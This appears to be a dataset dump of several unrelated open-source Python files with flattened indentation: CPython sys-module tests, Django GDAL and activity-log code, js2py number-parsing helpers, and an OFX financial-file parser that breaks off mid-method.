def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
        # has been set to a nonexistent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('3P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
check(get_cell().__code__, size('5i9Pi3P'))
check(get_cell.__code__, size('5i9Pi3P'))
def get_cell2(x):
def inner():
return x
return inner
check(get_cell2.__code__, size('5i9Pi3P') + 1)
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('n2P' + '2nPn' + 8*'n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('n2P' + '2nPn') + 16*struct.calcsize('n2P'))
# dictionary-keyiterator
check({}.keys(), size('P'))
# dictionary-valueiterator
check({}.values(), size('P'))
# dictionary-itemiterator
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
        # Ellipsis
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# memoryview
check(memoryview(b''), size('Pnin 2P2n2i5P 3cPn'))
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3n2P' + PySet_MINSIZE*'nP' + 'nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('nP'))
check(frozenset(sample), s + newsize*struct.calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
s = vsize('P2n15Pl4Pn9Pn11PIP')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = vsize('P2n15Pl4Pn9Pn11PIP') + struct.calcsize('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += struct.calcsize("2nPn") + 4*struct.calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('n2P' + '2nPn'))
# unicode
        # each sample is a string; its expected character size is derived
        # below from its widest code point. Don't put any static strings
        # here, as they may contain wchar_t or UTF-8 representations.
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
vmarkovtsev/django
|
refs/heads/master
|
django/contrib/gis/gdal/__init__.py
|
327
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may be desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import ( # NOQA
GDALException, OGRException, OGRIndexError, SRSException, check_err,
)
from django.contrib.gis.gdal.geomtype import OGRGeomType # NOQA
__all__ = [
'check_err', 'GDALException', 'OGRException', 'OGRIndexError',
'SRSException', 'OGRGeomType', 'HAS_GDAL',
]
# Attempt to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver # NOQA
from django.contrib.gis.gdal.datasource import DataSource # NOQA
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION # NOQA
from django.contrib.gis.gdal.raster.source import GDALRaster # NOQA
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform # NOQA
from django.contrib.gis.gdal.geometries import OGRGeometry # NOQA
HAS_GDAL = True
__all__ += [
'Driver', 'DataSource', 'gdal_version', 'gdal_full_version',
'GDALRaster', 'GDAL_VERSION', 'SpatialReference', 'CoordTransform',
'OGRGeometry',
]
except GDALException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
__all__ += ['Envelope']
except ImportError:
# No ctypes, but don't raise an exception.
pass
|
houssemFat/MeeM-Dev
|
refs/heads/master
|
core/apps/history/models.py
|
1
|
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_text
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
from datetime import datetime
from core.apps.accounts.models import User
class UserLogEntryManager(models.Manager):
def log_action(self, user_id, content_type_id, object_id, object_repr, action_flag, change_message=''):
        # Use keyword arguments: this model declares `user` before
        # `action_time`, so the positional call copied from admin's
        # LogEntry would map the values to the wrong fields.
        e = self.model(user_id=user_id, content_type_id=content_type_id,
                       object_id=smart_text(object_id),
                       object_repr=object_repr[:200],
                       action_flag=action_flag, change_message=change_message)
e.save()
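# Usage sketch (ids, flag and message are illustrative):
#   UserLogEntry.objects.log_action(
#       request.user.pk,
#       ContentType.objects.get_for_model(obj).pk,
#       obj.pk, str(obj), 1, 'Created')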
class UserLogEntry(models.Model):
user = models.ForeignKey(User, related_name="history")
    # using auto_now=True makes the attribute non-editable, so you can't retrieve its value using model_to_dict
action_time = models.DateTimeField(_('action time'))
content_type = models.ForeignKey(ContentType, blank=True, null=True)
object_id = models.TextField(_('object id'), blank=True, null=True)
object_repr = models.CharField(_('object repr'), max_length=200)
action_flag = models.PositiveSmallIntegerField(_('action flag'))
change_message = models.TextField(_('change message'), blank=True)
objects = UserLogEntryManager()
def save(self, *args, **kwargs):
''' On save, update timestamps '''
        if not self.id:
            self.action_time = datetime.now()
return super(UserLogEntry, self).save(*args, **kwargs)
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
db_table = 'accounts_user_activity_history'
ordering = ('-action_time',)
def __unicode__(self):
return self.change_message
|
repotvsupertuga/tvsupertuga.repository
|
refs/heads/master
|
instal/script.module.liveresolver/lib/js2py/host/jsfunctions.py
|
39
|
from js2py.base import *
RADIX_CHARS = {'1': 1, '0': 0, '3': 3, '2': 2, '5': 5, '4': 4, '7': 7, '6': 6, '9': 9, '8': 8, 'a': 10, 'c': 12,
'b': 11, 'e': 14, 'd': 13, 'g': 16, 'f': 15, 'i': 18, 'h': 17, 'k': 20, 'j': 19, 'm': 22, 'l': 21,
'o': 24, 'n': 23, 'q': 26, 'p': 25, 's': 28, 'r': 27, 'u': 30, 't': 29, 'w': 32, 'v': 31, 'y': 34,
'x': 33, 'z': 35, 'A': 10, 'C': 12, 'B': 11, 'E': 14, 'D': 13, 'G': 16, 'F': 15, 'I': 18, 'H': 17,
'K': 20, 'J': 19, 'M': 22, 'L': 21, 'O': 24, 'N': 23, 'Q': 26, 'P': 25, 'S': 28, 'R': 27, 'U': 30,
'T': 29, 'W': 32, 'V': 31, 'Y': 34, 'X': 33, 'Z': 35}
@Js
def parseInt(string, radix):
string = string.to_string().value.lstrip()
sign = 1
if string and string[0] in ['+', '-']:
if string[0]=='-':
sign = -1
string = string[1:]
r = radix.to_int32()
strip_prefix = True
if r:
if r<2 or r>36:
return NaN
if r!=16:
strip_prefix = False
else:
r = 10
if strip_prefix:
if len(string)>=2 and string[:2] in ['0x', '0X']:
string = string[2:]
r = 16
n = 0
num = 0
while n<len(string):
cand = RADIX_CHARS.get(string[n])
if cand is None or not cand < r:
break
num = cand + num*r
n += 1
if not n:
return NaN
return sign*num
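# JS semantics preserved (arguments arrive Js-wrapped at runtime), e.g.:
#   parseInt('42px')   -> 42
#   parseInt('0x1A')   -> 26
#   parseInt('z', 36)  -> 35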
@Js
def parseFloat(string):
string = string.to_string().value.strip()
sign = 1
if string and string[0] in ['+', '-']:
if string[0]=='-':
sign = -1
string = string[1:]
num = None
length = 1
max_len = None
failed = 0
while length<=len(string):
try:
num = float(string[:length])
max_len = length
failed = 0
        except ValueError:
            failed += 1
            if failed > 4:  # can't be a number anymore
break
length += 1
if num is None:
return NaN
return sign*float(string[:max_len])
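# JS semantics preserved, e.g.:
#   parseFloat('3.5abc')  -> 3.5
#   parseFloat('  -4e2')  -> -400.0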
@Js
def isNaN(number):
if number.to_number().is_nan():
return true
return false
@Js
def isFinite(number):
num = number.to_number()
if num.is_nan() or num.is_infinity():
return false
return true
# TODO: URI handling!
|
hiromu2000/ofxparse
|
refs/heads/master
|
ofxparse/ofxparse.py
|
1
|
from __future__ import absolute_import, with_statement
import sys
import decimal
import datetime
import codecs
import re
import collections
import contextlib
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import six
if 'OrderedDict' in dir(collections):
odict = collections
else:
import ordereddict as odict
from . import mcc
def skip_headers(fh):
'''
Prepare `fh` for parsing by BeautifulSoup by skipping its OFX
headers.
'''
if fh is None or isinstance(fh, six.string_types):
return
fh.seek(0)
header_re = re.compile(r"^\s*\w+:\s*\w+\s*$")
while True:
pos = fh.tell()
line = fh.readline()
if not line:
break
if header_re.search(line) is None:
fh.seek(pos)
return
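# OFX 1.x headers are plain KEY:VALUE lines preceding the SGML/XML body, e.g.:
#   OFXHEADER:100
#   DATA:OFXSGML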
def soup_maker(fh):
skip_headers(fh)
try:
from bs4 import BeautifulSoup
soup = BeautifulSoup(fh, "xml")
for tag in soup.findAll():
tag.name = tag.name.lower()
except ImportError:
from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(fh)
return soup
def try_decode(string, encoding):
if hasattr(string, 'decode'):
string = string.decode(encoding)
return string
def is_iterable(candidate):
if sys.version_info < (2,6):
return hasattr(candidate, 'next')
return isinstance(candidate, collections.Iterable)
@contextlib.contextmanager
def save_pos(fh):
"""
Save the position of the file handle, seek to the beginning, and
then restore the position.
"""
orig_pos = fh.tell()
fh.seek(0)
try:
yield fh
finally:
fh.seek(orig_pos)
class OfxFile(object):
def __init__(self, fh):
"""
fh should be a seekable file-like byte stream object
"""
self.headers = odict.OrderedDict()
self.fh = fh
if not is_iterable(self.fh):
return
if not hasattr(self.fh, "seek"):
return # fh is not a file object, we're doomed.
with save_pos(self.fh):
self.read_headers()
self.handle_encoding()
self.replace_NONE_headers()
def read_headers(self):
head_data = self.fh.read(1024 * 10)
head_data = head_data[:head_data.find(six.b('<'))]
for line in re.split(six.b('\r?\n?'), head_data):
# Newline?
if line.strip() == six.b(""):
break
            header, value = line.split(six.b(":"), 1)
header, value = header.strip().upper(), value.strip()
self.headers[header] = value
def handle_encoding(self):
"""
Decode the headers and wrap self.fh in a decoder such that it
subsequently returns only text.
"""
# decode the headers using ascii
ascii_headers = odict.OrderedDict(
(
key.decode('ascii', 'replace'),
value.decode('ascii', 'replace'),
)
for key, value in six.iteritems(self.headers)
)
enc_type = ascii_headers.get('ENCODING')
if not enc_type:
# no encoding specified, use the ascii-decoded headers
self.headers = ascii_headers
# decode the body as ascii as well
self.fh = codecs.lookup('ascii').streamreader(self.fh)
return
if enc_type == "USASCII":
cp = ascii_headers.get("CHARSET", "1252")
encoding = "cp%s" % (cp, )
        elif enc_type in ("UNICODE", "UTF-8"):
            encoding = "utf-8"
        else:
            # Unrecognized ENCODING header; fall back to utf-8 rather than
            # raise NameError below (the fallback choice is an assumption).
            encoding = "utf-8"
codec = codecs.lookup(encoding)
self.fh = codec.streamreader(self.fh)
# Decode the headers using the encoding
self.headers = odict.OrderedDict(
(key.decode(encoding), value.decode(encoding))
for key, value in six.iteritems(self.headers)
)
def replace_NONE_headers(self):
"""
Any headers that indicate 'none' should be replaced with Python
None values
"""
for header in self.headers:
if self.headers[header].upper() == 'NONE':
self.headers[header] = None
class OfxPreprocessedFile(OfxFile):
def __init__(self, fh):
super(OfxPreprocessedFile,self).__init__(fh)
if self.fh is None:
return
ofx_string = self.fh.read()
# find all closing tags as hints
closing_tags = [ t.upper() for t in re.findall(r'(?i)</([a-z0-9_\.]+)>', ofx_string) ]
# close all tags that don't have closing tags and
# leave all other data intact
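        # e.g. '<STMTTRN><FITID>1<NAME>X</STMTTRN>' becomes
        #      '<STMTTRN><FITID>1</FITID><NAME>X</NAME></STMTTRN>'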
last_open_tag = None
tokens = re.split(r'(?i)(</?[a-z0-9_\.]+>)', ofx_string)
new_fh = StringIO()
for idx,token in enumerate(tokens):
is_closing_tag = token.startswith('</')
is_processing_tag = token.startswith('<?')
is_cdata = token.startswith('<!')
is_tag = token.startswith('<') and not is_cdata
is_open_tag = is_tag and not is_closing_tag and not is_processing_tag
if is_tag:
if last_open_tag is not None:
new_fh.write("</%s>" % last_open_tag)
last_open_tag = None
if is_open_tag:
tag_name = re.findall(r'(?i)<([a-z0-9_\.]+)>', token)[0]
if tag_name.upper() not in closing_tags:
last_open_tag = tag_name
new_fh.write(token)
new_fh.seek(0)
self.fh = new_fh
class Ofx(object):
def __str__(self):
return ""
# headers = "\r\n".join(":".join(el if el else "NONE" for el in item) for item in six.iteritems(self.headers))
# headers += "\r\n\r\n"
#
# return headers + str(self.signon)
class AccountType(object):
(Unknown, Bank, CreditCard, Investment) = range(0, 4)
class Account(object):
def __init__(self):
self.curdef = None
self.statement = None
self.account_id = ''
self.routing_number = ''
self.branch_id = ''
self.account_type = ''
self.institution = None
self.type = AccountType.Unknown
# Used for error tracking
self.warnings = []
@property
def number(self):
# For backwards compatibility. Remove in version 1.0.
return self.account_id
class InvestmentAccount(Account):
def __init__(self):
super(InvestmentAccount, self).__init__()
self.brokerid = ''
class Security:
def __init__(self, uniqueid, name, ticker, memo):
self.uniqueid = uniqueid
self.name = name
self.ticker = ticker
self.memo = memo
class Signon:
def __init__(self, keys):
self.code = keys['code']
self.severity = keys['severity']
self.message = keys['message']
self.dtserver = keys['dtserver']
self.language = keys['language']
self.dtprofup = keys['dtprofup']
self.fi_org = keys['org']
self.fi_fid = keys['fid']
self.intu_bid = keys['intu.bid']
        self.success = int(self.code) == 0
def __str__(self):
ret = "\t<SIGNONMSGSRSV1>\r\n" + "\t\t<SONRS>\r\n" + "\t\t\t<STATUS>\r\n"
ret += "\t\t\t\t<CODE>%s\r\n" % self.code
ret += "\t\t\t\t<SEVERITY>%s\r\n" % self.severity
if self.message:
ret += "\t\t\t\t<MESSAGE>%s\r\n" % self.message
ret += "\t\t\t</STATUS>\r\n"
if self.dtserver is not None:
ret += "\t\t\t<DTSERVER>" + self.dtserver + "\r\n"
if self.language is not None:
ret += "\t\t\t<LANGUAGE>" + self.language + "\r\n"
if self.dtprofup is not None:
ret += "\t\t\t<DTPROFUP>" + self.dtprofup + "\r\n"
if (self.fi_org is not None) or (self.fi_fid is not None):
ret += "\t\t\t<FI>\r\n"
if self.fi_org is not None:
ret += "\t\t\t\t<ORG>" + self.fi_org + "\r\n"
if self.fi_fid is not None:
ret += "\t\t\t\t<FID>" + self.fi_fid + "\r\n"
ret += "\t\t\t</FI>\r\n"
if self.intu_bid is not None:
ret += "\t\t\t<INTU.BID>" + self.intu_bid + "\r\n"
ret += "\t\t</SONRS>\r\n"
ret += "\t</SIGNONMSGSRSV1>\r\n"
return ret
class Statement(object):
def __init__(self):
self.start_date = ''
self.end_date = ''
self.currency = ''
self.transactions = []
# Error tracking:
self.discarded_entries = []
self.warnings = []
class InvestmentStatement(object):
def __init__(self):
self.positions = []
self.transactions = []
# Error tracking:
self.discarded_entries = []
self.warnings = []
class Transaction(object):
def __init__(self):
self.payee = ''
self.type = ''
self.date = None
self.amount = None
self.id = ''
self.memo = ''
self.sic = None
self.mcc = ''
self.checknum = ''
def __repr__(self):
return "<Transaction units=" + str(self.amount) + ">"
class InvestmentTransaction(object):
(Unknown, BuyMF, SellMF, Reinvest, BuyStock, SellStock, Income) = [x for x in range(-1, 6)]
def __init__(self, type):
try:
self.type = ['buymf', 'sellmf', 'reinvest', 'buystock', 'sellstock', 'income'].index(type.lower())
except ValueError:
self.type = InvestmentTransaction.Unknown
self.tradeDate = None
self.settleDate = None
self.memo = ''
self.security = ''
self.income_type = ''
self.units = decimal.Decimal(0)
self.unit_price = decimal.Decimal(0)
self.commission = decimal.Decimal(0)
self.fees = decimal.Decimal(0)
self.total = decimal.Decimal(0)
def __repr__(self):
return "<InvestmentTransaction type=" + str(self.type) + ", units=" + str(self.units) + ">"
class Position(object):
def __init__(self):
self.security = ''
self.units = decimal.Decimal(0)
self.unit_price = decimal.Decimal(0)
class Institution(object):
def __init__(self):
self.organization = ''
self.fid = ''
class OfxParserException(Exception):
pass
class OfxParser(object):
@classmethod
def parse(cls_, file_handle, fail_fast=True):
'''
        parse is the main entry point for an OfxParser. It takes a file
        handle and an optional fail_fast flag.
        If fail_fast is True, the parser will fail on any errors.
        If fail_fast is False, the parser will record bad statements on the
        statement class and continue to run. Note: the library does not
        guarantee that no exceptions will be raised to the caller, only
        that bad transactions will be recorded (and marked) on the statement.
'''
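        # Typical usage (file name illustrative):
        #   with open('statement.ofx', 'rb') as fh:
        #       ofx = OfxParser.parse(fh)
        #   transactions = ofx.account.statement.transactions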
cls_.fail_fast = fail_fast
if not hasattr(file_handle, 'seek'):
raise TypeError(six.u('parse() accepts a seek-able file handle, not %s'
% type(file_handle).__name__))
ofx_obj = Ofx()
# Store the headers
ofx_file = OfxPreprocessedFile(file_handle)
ofx_obj.headers = ofx_file.headers
ofx_obj.accounts = []
ofx_obj.signon = None
skip_headers(ofx_file.fh)
ofx = soup_maker(ofx_file.fh)
if ofx.find('ofx') is None:
raise OfxParserException('The ofx file is empty!')
sonrs_ofx = ofx.find('sonrs')
if sonrs_ofx:
ofx_obj.signon = cls_.parseSonrs(sonrs_ofx)
stmttrnrs = ofx.find('stmttrnrs')
if stmttrnrs:
stmttrnrs_trnuid = stmttrnrs.find('trnuid')
if stmttrnrs_trnuid:
ofx_obj.trnuid = stmttrnrs_trnuid.contents[0].strip()
stmttrnrs_status = stmttrnrs.find('status')
if stmttrnrs_status:
ofx_obj.status = {}
ofx_obj.status['code'] = int(
stmttrnrs_status.find('code').contents[0].strip()
)
ofx_obj.status['severity'] = \
stmttrnrs_status.find('severity').contents[0].strip()
stmtrs_ofx = ofx.findAll('stmtrs')
if stmtrs_ofx:
ofx_obj.accounts += cls_.parseStmtrs(stmtrs_ofx, AccountType.Bank)
ccstmtrs_ofx = ofx.findAll('ccstmtrs')
if ccstmtrs_ofx:
ofx_obj.accounts += cls_.parseStmtrs(
ccstmtrs_ofx, AccountType.CreditCard)
invstmtrs_ofx = ofx.findAll('invstmtrs')
if invstmtrs_ofx:
ofx_obj.accounts += cls_.parseInvstmtrs(invstmtrs_ofx)
seclist_ofx = ofx.find('seclist')
if seclist_ofx:
